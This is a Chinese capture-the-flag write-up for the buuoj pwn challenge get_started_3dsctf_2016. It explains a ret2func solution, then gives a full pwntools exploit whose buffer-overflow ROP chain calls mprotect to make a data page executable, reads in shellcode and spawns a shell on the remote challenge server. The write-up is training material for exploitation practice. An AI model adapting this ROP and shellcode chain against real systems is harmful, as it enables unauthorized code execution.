zoukankan      html  css  js  c++  java
  • buuoj get_started_3dsctf_2016 WriteUp

    比较常规的解法:

      由于这题没有出现setbuf(stdin,0),所以本题的输出是缓存在服务器本地的,换句话说:如果程序不正常退出,本题是不会回显flag的。但是本题提供了exit()函数,注意再调用get_flag函数后再ret到exit()函数就可以回显flag了。

      32位程序payload = offset + 函数地址 + 返回地址(一定要是exit函数的地址) + 参数

    不常规的解法:

      那就是通过mprotect函数来修改内存页的可执行权限。

    int mprotect(const void *start, size_t len, int prot);

      第一个参数填的是一个地址,是指需要进行操作的地址,第二个参数是修改内存的大小(内存页的整数倍),第三个参数的是要赋予的权限(7,即二进制111是RWX权限)。

      我们先通过gdb确定内存页的分布,现给main函数出下断点,然后运行程序输入命令vmmap查看内存页权限。如下图所示:

     HEAP STACK和CODE页就别动了,选择DATA页0x80EA000(可以看到此页并没有X权限)作为修改可执行权限的目标。

    exp如下:

    from pwn import *
    from LibcSearcher import *
    
    context(os = 'linux',arch = 'i386',log_level = 'debug')
    #p = process('./get_started_3dsctf_2016')
    elf = ELF('./get_started_3dsctf_2016')
    p = remote("node3.buuoj.cn",25748)
    mp_addr = elf.symbols['mprotect']
    read_addr = elf.symbols['read']
    rwx_start = 0x80EA000
    pop3_ret = 0x804f460
    payload = b'a'*56
    payload += p32(mp_addr)       
    payload += p32(pop3_ret)      #pop三次是为了正确跳转到rwx_data
    payload += p32(rwx_start)     #修改内存权限的首地址
    payload += p32(0x2000)        #第二个参数必须是内存页的整数倍(好像0x1000也行)
    payload += p32(0x7)           #RWX权限全开
    payload += p32(read_addr)
    payload += p32(rwx_start)     #调用read函数结束后的返回地址
    payload += p32(0x0)           #read函数第一个参数,标准输入
    payload += p32(rwx_start)     #输入字符串地址
    payload += p32(0x200)         #输入字符串最大数目
    p.sendline(payload)           #在接受asm字符串后read函数就会ret到rwx_addr去执行shellcode
    payload = asm(shellcraft.sh(),os = 'linux',arch = 'i386')
    p.sendline(payload)
    p.interactive()
  • 相关阅读:
    HDU 2553 N皇后问题
    HDU 1251 统计难题(Trie tree)
    NYOJ 325 zb的生日
    dedecms文章页调用tag关键词_增加内链和关键字密度
    用DEDECMS做手机网站
    DedeCMS模板文件结构
    DEDECMS如何让栏目外部链接在新窗口中打开
    dedecms arclist中的自增变量 autoindex的说明
    dedecms 分页样式
    dedecms 修改默认html存放目录
  • 原文地址:https://www.cnblogs.com/csuchenzc/p/14375662.html
Copyright © 2011-2022 走看看